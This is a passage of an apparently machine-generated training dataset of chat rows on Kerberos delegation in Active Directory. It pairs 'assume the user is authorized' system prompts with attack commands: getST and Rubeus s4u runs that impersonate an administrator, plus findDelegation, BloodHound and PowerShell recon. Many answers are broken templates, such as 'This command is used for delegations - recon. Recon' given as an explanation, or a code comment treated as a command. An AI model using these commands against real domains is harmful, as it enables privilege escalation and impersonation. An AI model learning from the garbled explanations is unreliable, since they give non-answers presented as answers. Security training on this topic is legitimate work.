accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the getST command to (kcd) constrained - 2. additional s4u2proxy", "response": "getST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"", "metadata": {"corpus_index": 525, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "getST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through (KCD) Constrained - 2. Additional S4U2proxy"}, {"role": "assistant", "content": "getST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through (KCD) Constrained - 2. Additional S4U2proxy", "response": "getST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"", "metadata": {"corpus_index": 525, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `getST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"`?"}, {"role": "assistant", "content": "This command is used for (kcd) constrained - 2. additional s4u2proxy. 2. Additional S4U2proxy"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `getST -spn \"cifs/target\" -impersonate \"administrator\" -additional-ticket \"administrator.ccache\" \"domain/serviceA:password\"`?", "response": "This command is used for (kcd) constrained - 2. additional s4u2proxy. 2. Additional S4U2proxy", "metadata": {"corpus_index": 525, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Rubeus.exe for (kcd) constrained - 2. additional s4u2proxy?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Rubeus.exe for (kcd) constrained - 2. additional s4u2proxy?", "response": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"", "metadata": {"corpus_index": 526, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out (KCD) Constrained - 2. Additional S4U2proxy during a pentest?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out (KCD) Constrained - 2. Additional S4U2proxy during a pentest?", "response": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"", "metadata": {"corpus_index": 526, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"`?"}, {"role": "assistant", "content": "This command is used for (kcd) constrained - 2. additional s4u2proxy. 2. Additional S4U2proxy"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe s4u /nowrap /msdsspn:\"cifs/target\" /impersonateuser:\"administrator\" /tgs:\"base64 | file.kirbi\" /domain:\"domain\" /user:\"user\" /password:\"password\"`?", "response": "This command is used for (kcd) constrained - 2. additional s4u2proxy. 2. Additional S4U2proxy", "metadata": {"corpus_index": 526, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/constrained.md", "page_title": "(KCD) Constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Delegations - Theory"}, {"role": "assistant", "content": "Kerberos delegations allow services to access other services on behalf of domain users."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Delegations - Theory", "response": "Kerberos delegations allow services to access other services on behalf of domain users.", "metadata": {"corpus_index": 527, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Delegations - Theory"}, {"role": "assistant", "content": "Kerberos delegations allow services to access other services on behalf of domain users."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Delegations - Theory", "response": "Kerberos delegations allow services to access other services on behalf of domain users.", "metadata": {"corpus_index": 527, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Delegations - Types of delegation?"}, {"role": "assistant", "content": "The \"Kerberos\" authentication protocol features delegation capabilities described as follows. There are three types of Kerberos delegations\n\n* Unconstrained delegations (KUD): a service can impersonate users on any other service.\n* Constrained delegations (KCD): a service can impersonate users on a set of services\n* Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service\n\n> [!TIP]\n> With constrained and unconstrained delegations, the delegation attributes are set on the impersonating service (requires SeEnableDelegationPrivilege in the domain) whereas with RBCD, these attributes are set on the target service account itself (requires lower privileges)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Delegations - Types of delegation?", "response": "The \"Kerberos\" authentication protocol features delegation capabilities described as follows. There are three types of Kerberos delegations\n\n* Unconstrained delegations (KUD): a service can impersonate users on any other service.\n* Constrained delegations (KCD): a service can impersonate users on a set of services\n* Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service\n\n> [!TIP]\n> With constrained and unconstrained delegations, the delegation attributes are set on the impersonating service (requires SeEnableDelegationPrivilege in the domain) whereas with RBCD, these attributes are set on the target service account itself (requires lower privileges).", "metadata": {"corpus_index": 528, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Delegations - Types of delegation?"}, {"role": "assistant", "content": "The \"Kerberos\" authentication protocol features delegation capabilities described as follows. There are three types of Kerberos delegations\n\n* Unconstrained delegations (KUD): a service can impersonate users on any other service.\n* Constrained delegations (KCD): a service can impersonate users on a set of services\n* Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service\n\n> [!TIP]\n> With constrained and unconstrained delegations, the delegation attributes are set on the impersonating service (requires SeEnableDelegationPrivilege in the domain) whereas with RBCD, these attributes are set on the target service account itself (requires lower privileges)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Delegations - Types of delegation?", "response": "The \"Kerberos\" authentication protocol features delegation capabilities described as follows. There are three types of Kerberos delegations\n\n* Unconstrained delegations (KUD): a service can impersonate users on any other service.\n* Constrained delegations (KCD): a service can impersonate users on a set of services\n* Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service\n\n> [!TIP]\n> With constrained and unconstrained delegations, the delegation attributes are set on the impersonating service (requires SeEnableDelegationPrivilege in the domain) whereas with RBCD, these attributes are set on the target service account itself (requires lower privileges).", "metadata": {"corpus_index": 528, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Delegations - Extensions work?"}, {"role": "assistant", "content": "Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called Service-for-User (S4U).\n\nWant to know more about S4U2self and S4U2proxy (required to understand some delegation abuses) : click here.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of another user (called \"principal\"), to itself. Service for User to Proxy (S4U2proxy) allows a service to obtain a Service Ticket, on behalf of a user to a different service. \n\nSome of the following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Delegations - Extensions work?", "response": "Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called Service-for-User (S4U).\n\nWant to know more about S4U2self and S4U2proxy (required to understand some delegation abuses) : click here.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of another user (called \"principal\"), to itself. Service for User to Proxy (S4U2proxy) allows a service to obtain a Service Ticket, on behalf of a user to a different service. \n\nSome of the following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.", "metadata": {"corpus_index": 529, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Delegations - Extensions?"}, {"role": "assistant", "content": "Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called Service-for-User (S4U).\n\nWant to know more about S4U2self and S4U2proxy (required to understand some delegation abuses) : click here.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of another user (called \"principal\"), to itself. Service for User to Proxy (S4U2proxy) allows a service to obtain a Service Ticket, on behalf of a user to a different service. \n\nSome of the following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Delegations - Extensions?", "response": "Kerberos delegations can be abused by attackers to obtain access to valuable assets and sometimes even escalate to domain admin privileges. Regarding constrained delegations and rbcd, those types of delegation rely on Kerberos extensions called Service-for-User (S4U).\n\nWant to know more about S4U2self and S4U2proxy (required to understand some delegation abuses) : click here.\n\nSimply put, Service for User to Self (S4U2self) allows a service to obtain a Service Ticket, on behalf of another user (called \"principal\"), to itself. Service for User to Proxy (S4U2proxy) allows a service to obtain a Service Ticket, on behalf of a user to a different service. \n\nSome of the following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.", "metadata": {"corpus_index": 529, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Delegations - Recon work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's findDelegation (Python) script can be used to find unconstrained, constrained (with or without protocol transition) and rbcd.\n\n``bash\nfindDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\nAt the time of writing (13th October 2021), a Pull Request is pending to feature a -user filter to list delegations for a specific account.\n\n`bash\nfindDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows systems, BloodHound can be used to identify unconstrained and constrained delegation.\n\nThe following queries can be used to audit delegations.\n\n`cypher\n// Unconstrained Delegation\nMATCH (c {unconstraineddelegation:true}) return c\n\n// Constrained Delegation (with Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=true return c\n\n// Constrained Delegation (without Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=false return c\n\n// Resource-Based Constrained Delegation\nMATCH p=(u)-[:AllowedToAct]->(c) RETURN p\n`\n\nThe Powershell Active Directory module also has a cmdlet that can be used to find delegation for a specific account.\n\n`powershell\nGet-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount\n`\n\n| Property | Delegation type | | |\n| --- | --- | --- | --- |\n| TrustedForDelegation | Unconstrained Delegation | | |\n| TrustedToAuthForDelegation | Constrained Delegation with Protocol Transition | | |\n| AllowedToDelegateTo | Constrained Delegation, and list of services allowed to delegate to | | |\n| PrincipalsAllowedToDelegateToAccount (i.e. refers to the msDS-AllowedToActOnBehalfOfOtherIdentity` attribute) | RBCD, list of services that can delegate to the account | | |\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Delegations - Recon work?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's findDelegation (Python) script can be used to find unconstrained, constrained (with or without protocol transition) and rbcd.\n\n``bash\nfindDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\nAt the time of writing (13th October 2021), a Pull Request is pending to feature a -user filter to list delegations for a specific account.\n\n`bash\nfindDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows systems, BloodHound can be used to identify unconstrained and constrained delegation.\n\nThe following queries can be used to audit delegations.\n\n`cypher\n// Unconstrained Delegation\nMATCH (c {unconstraineddelegation:true}) return c\n\n// Constrained Delegation (with Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=true return c\n\n// Constrained Delegation (without Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=false return c\n\n// Resource-Based Constrained Delegation\nMATCH p=(u)-[:AllowedToAct]->(c) RETURN p\n`\n\nThe Powershell Active Directory module also has a cmdlet that can be used to find delegation for a specific account.\n\n`powershell\nGet-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount\n`\n\n| Property | Delegation type | | |\n| --- | --- | --- | --- |\n| TrustedForDelegation | Unconstrained Delegation | | |\n| TrustedToAuthForDelegation | Constrained Delegation with Protocol Transition | | |\n| AllowedToDelegateTo | Constrained Delegation, and list of services allowed to delegate to | | |\n| PrincipalsAllowedToDelegateToAccount (i.e. refers to the msDS-AllowedToActOnBehalfOfOtherIdentity` attribute) | RBCD, list of services that can delegate to the account | | |\n\n:::", "metadata": {"corpus_index": 530, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Delegations - Recon"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's findDelegation (Python) script can be used to find unconstrained, constrained (with or without protocol transition) and rbcd.\n\n``bash\nfindDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\nAt the time of writing (13th October 2021), a Pull Request is pending to feature a -user filter to list delegations for a specific account.\n\n`bash\nfindDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows systems, BloodHound can be used to identify unconstrained and constrained delegation.\n\nThe following queries can be used to audit delegations.\n\n`cypher\n// Unconstrained Delegation\nMATCH (c {unconstraineddelegation:true}) return c\n\n// Constrained Delegation (with Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=true return c\n\n// Constrained Delegation (without Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=false return c\n\n// Resource-Based Constrained Delegation\nMATCH p=(u)-[:AllowedToAct]->(c) RETURN p\n`\n\nThe Powershell Active Directory module also has a cmdlet that can be used to find delegation for a specific account.\n\n`powershell\nGet-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount\n`\n\n| Property | Delegation type | | |\n| --- | --- | --- | --- |\n| TrustedForDelegation | Unconstrained Delegation | | |\n| TrustedToAuthForDelegation | Constrained Delegation with Protocol Transition | | |\n| AllowedToDelegateTo | Constrained Delegation, and list of services allowed to delegate to | | |\n| PrincipalsAllowedToDelegateToAccount (i.e. refers to the msDS-AllowedToActOnBehalfOfOtherIdentity` attribute) | RBCD, list of services that can delegate to the account | | |\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Delegations - Recon", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's findDelegation (Python) script can be used to find unconstrained, constrained (with or without protocol transition) and rbcd.\n\n``bash\nfindDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\nAt the time of writing (13th October 2021), a Pull Request is pending to feature a -user filter to list delegations for a specific account.\n\n`bash\nfindDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"\n`\n\n=== Windows\n\nFrom Windows systems, BloodHound can be used to identify unconstrained and constrained delegation.\n\nThe following queries can be used to audit delegations.\n\n`cypher\n// Unconstrained Delegation\nMATCH (c {unconstraineddelegation:true}) return c\n\n// Constrained Delegation (with Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=true return c\n\n// Constrained Delegation (without Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=false return c\n\n// Resource-Based Constrained Delegation\nMATCH p=(u)-[:AllowedToAct]->(c) RETURN p\n`\n\nThe Powershell Active Directory module also has a cmdlet that can be used to find delegation for a specific account.\n\n`powershell\nGet-ADComputer \"Account\" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount\n`\n\n| Property | Delegation type | | |\n| --- | --- | --- | --- |\n| TrustedForDelegation | Unconstrained Delegation | | |\n| TrustedToAuthForDelegation | Constrained Delegation with Protocol Transition | | |\n| AllowedToDelegateTo | Constrained Delegation, and list of services allowed to delegate to | | |\n| PrincipalsAllowedToDelegateToAccount (i.e. refers to the msDS-AllowedToActOnBehalfOfOtherIdentity` attribute) | RBCD, list of services that can delegate to the account | | |\n\n:::", "metadata": {"corpus_index": 530, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the findDelegation.py syntax for delegations - recon?"}, {"role": "assistant", "content": "findDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the findDelegation.py syntax for delegations - recon?", "response": "findDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"", "metadata": {"corpus_index": 531, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "findDelegation.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Delegations - Recon"}, {"role": "assistant", "content": "findDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Delegations - Recon", "response": "findDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"", "metadata": {"corpus_index": 531, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `findDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"`?"}, {"role": "assistant", "content": "This command is used for delegations - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `findDelegation.py \"DOMAIN\"/\"USER\":\"PASSWORD\"`?", "response": "This command is used for delegations - recon. Recon", "metadata": {"corpus_index": 531, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the findDelegation.py command for delegations - recon"}, {"role": "assistant", "content": "findDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the findDelegation.py command for delegations - recon", "response": "findDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"", "metadata": {"corpus_index": 532, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "findDelegation.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Delegations - Recon?"}, {"role": "assistant", "content": "findDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Delegations - Recon?", "response": "findDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"", "metadata": {"corpus_index": 532, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `findDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"`?"}, {"role": "assistant", "content": "This command is used for delegations - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `findDelegation.py -user \"account\" \"DOMAIN\"/\"USER\":\"PASSWORD\"`?", "response": "This command is used for delegations - recon. Recon", "metadata": {"corpus_index": 532, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Delegations - Recon"}, {"role": "assistant", "content": "// Unconstrained Delegation\nMATCH (c {unconstraineddelegation:true}) return c\n\n// Constrained Delegation (with Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=true return c\n\n// Constrained Delegation (without Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=false return c\n\n// Resource-Based Constrained Delegation\nMATCH p=(u)-[:AllowedToAct]->(c) RETURN p"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Delegations - Recon", "response": "// Unconstrained Delegation\nMATCH (c {unconstraineddelegation:true}) return c\n\n// Constrained Delegation (with Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=true return c\n\n// Constrained Delegation (without Protocol Transition)\nMATCH (c) WHERE NOT c.allowedtodelegate IS NULL AND c.trustedtoauth=false return c\n\n// Resource-Based Constrained Delegation\nMATCH p=(u)-[:AllowedToAct]->(c) RETURN p", "metadata": {"corpus_index": 533, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `// Unconstrained Delegation`?"}, {"role": "assistant", "content": "This command is used for delegations - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `// Unconstrained Delegation`?", "response": "This command is used for delegations - recon. Recon", "metadata": {"corpus_index": 533, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/index.md", "page_title": "Delegations", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the 